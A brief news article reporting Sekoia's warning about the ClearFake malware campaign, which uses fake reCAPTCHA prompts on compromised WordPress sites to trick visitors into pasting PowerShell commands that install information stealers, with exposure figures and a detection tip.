A new variant of a “drive-by download” malware campaign is duping victims into running malicious code via fake reCAPTCHAs, cybersecurity company Sekoia has warned.
The ClearFake JavaScript framework reaches victims by injecting code into honest websites, primarily on WordPress.
Sekoia said at least 9,300 sites were known to be infected but the number could be much higher, with the threat “widespread and affect[ing] many users worldwide.”
The company said: “In July 2024, [threat detection] analysts had access to daily statistics on the number of visitors on compromised websites, revealing that approximately 200,000 unique users were potentially exposed to ClearFake lures encouraging them to download malware.”
See also: GenAI malware has been discovered in the wild, researchers claim
ClearFake’s imitation reCAPTCHAs are the latest evolution of its ‘ClickFix’ techniques, which use false versions of familiar pop ups, like ID verification windows, to alert users of an ‘issue’ and lead them to run nefarious code.
In the most recent cases, after attempting what appears to be a legitimate reCAPTCHA, users are told their verification has failed and prompted to open Windows’ PowerShell program and copy in secretly malicious code already added to their clipboard.
ClearFake was first identified in June 2023, using fake web browser updates to trick site users into downloading malware, but turned to ClickFix techniques last year.
Sekoia said its recent analysis showed ClearFake's operator had "consistently updated the framework code", with the framework's execution now relying "on multiple pieces of data stored in the Binance Smart Chain, including JavaScript code, AES key, URLs hosting lure HTML files, and ClickFix PowerShell commands."
Once it has made its way onto a device, ClearFake is known to distribute the Emmenhtal malware loader and the Lumma Stealer, and Vidar Stealer information stealers.
While sophisticated reCAPTCHA, and Cloudfare turnstile, imitations may be enough to dupe unknowing site users, Sekoia advises one tell of a ClearFake infection is the use of the same images for each ID verification attempt.
